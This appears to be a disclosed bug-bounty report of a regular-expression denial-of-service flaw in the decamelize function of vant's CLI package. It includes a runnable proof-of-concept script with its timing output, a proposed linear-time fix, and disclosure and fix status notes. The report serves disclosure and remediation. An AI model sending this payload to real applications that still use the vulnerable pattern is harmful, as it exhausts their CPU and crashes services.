Overly Restrictive Regular Expression in youzan/vant

Valid

Reported on Sep 30th 2021


✍️ Description

The @vant/cli package is vulnerable to Regular Expression Denial of Service (ReDoS). An attacker who can supply a crafted string as input to the decamelize function can make an application consume an excessive amount of CPU. The pinned lines linked below use the vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/youzan/vant/blob/ee7aae8b1c48d36366dcae3c5869b771040a8ea9/packages/vant-cli/site/common/index.js#L4-L9

Put the code below in a poc.js file and run it with node:

// Copied from the pinned vant-cli lines; the `export` keyword is dropped so the file runs as plain `node poc.js`.
function decamelize(str, sep = '-') {
  return str
    .replace(/([a-z\d])([A-Z])/g, '$1' + sep + '$2')
    // Vulnerable pattern: `[A-Z]+` followed by `[A-Z]` backtracks over every
    // prefix of a long run of capitals that is never followed by a lowercase letter or digit.
    .replace(/([A-Z]+)([A-Z][a-z\d]+)/g, '$1' + sep + '$2')
    .toLowerCase();
}
// Payload: a run of capitals plus a trailing space, 10,000 characters longer each round.
// The time per call grows roughly quadratically, so the loop is normally stopped long before i reaches 500.
for (let i = 1; i <= 500; i++) {
  const time = Date.now();
  const payload = 'A'.repeat(i * 10000) + ' ';
  decamelize(payload);
  const timeCost = Date.now() - time;
  console.log('Decamelize time : ' + payload.length + ': ' + timeCost + ' ms');
}

Check the Output:

Decamelize time : 10001: 123 ms
Decamelize time : 20001: 516 ms
Decamelize time : 30001: 1103 ms
Decamelize time : 40001: 1957 ms
Decamelize time : 50001: 3097 ms
Decamelize time : 60001: 4924 ms
Decamelize time : 70001: 6508 ms
Decamelize time : 80001: 8102 ms
Decamelize time : 90001: 11149 ms
Decamelize time : 100001: 12864 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.
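A linear-time replacement, added here as an example and not code from vant or from the 4.0.1 fix commit: it reproduces the splitting rules of the two regexes with a single left-to-right scan, so the cost no longer depends on backtracking (the helper names and the assumption that `sep` is not a letter or digit are mine):

```javascript
// Added example, not vant's code and not the fix shipped in 4.0.1: a
// decamelize that scans the string once instead of using the backtracking
// regex /([A-Z]+)([A-Z][a-z\d]+)/g, so its cost stays linear in the input.
// Assumes `sep` is not itself an ASCII letter or digit.
const isUpper = (c) => c >= 'A' && c <= 'Z';
const isLowerOrDigit = (c) => (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');

function decamelizeSafe(str, sep = '-') {
  const out = [];
  for (let i = 0; i < str.length; i++) {
    const c = str[i];
    if (i > 0 && isUpper(c)) {
      const prev = str[i - 1];
      const next = str[i + 1];
      // First regex of the original: lower/digit then upper ("fooBar" -> "foo-Bar").
      // Second regex: last upper of an upper run that is followed by a
      // lower/digit ("XMLHttp" -> "XML-Http"). Both only need the neighbours.
      if (isLowerOrDigit(prev) ||
          (isUpper(prev) && next !== undefined && isLowerOrDigit(next))) {
        out.push(sep);
      }
    }
    out.push(c);
  }
  return out.join('').toLowerCase();
}

// The vulnerable version from the report, kept only to cross-check outputs
// on short inputs (never feed it the long payload).
function decamelizeVulnerable(str, sep = '-') {
  return str
    .replace(/([a-z\d])([A-Z])/g, '$1' + sep + '$2')
    .replace(/([A-Z]+)([A-Z][a-z\d]+)/g, '$1' + sep + '$2')
    .toLowerCase();
}

// True when both implementations agree on every sample string.
function agreesOnSamples(samples) {
  return samples.every((s) => decamelizeSafe(s) === decamelizeVulnerable(s));
}

// Wall-clock milliseconds for one call; the safe version stays flat as the
// report's payload ("A".repeat(n) + " ") grows, the regex version does not.
function timeMs(fn, input) {
  const start = Date.now();
  fn(input);
  return Date.now() - start;
}
```

Running `timeMs(decamelizeSafe, 'A'.repeat(100000) + ' ')` returns a few milliseconds where the report's table shows about 12.8 seconds for the regex version on the same input.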

ready-research modified the report 2 years ago
ready-research submitted a
2 years ago
We have contacted a member of the youzan/vant team and are waiting to hear back 2 years ago
neverland validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
neverland marked this as fixed in 4.0.1 with commit 202efb 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE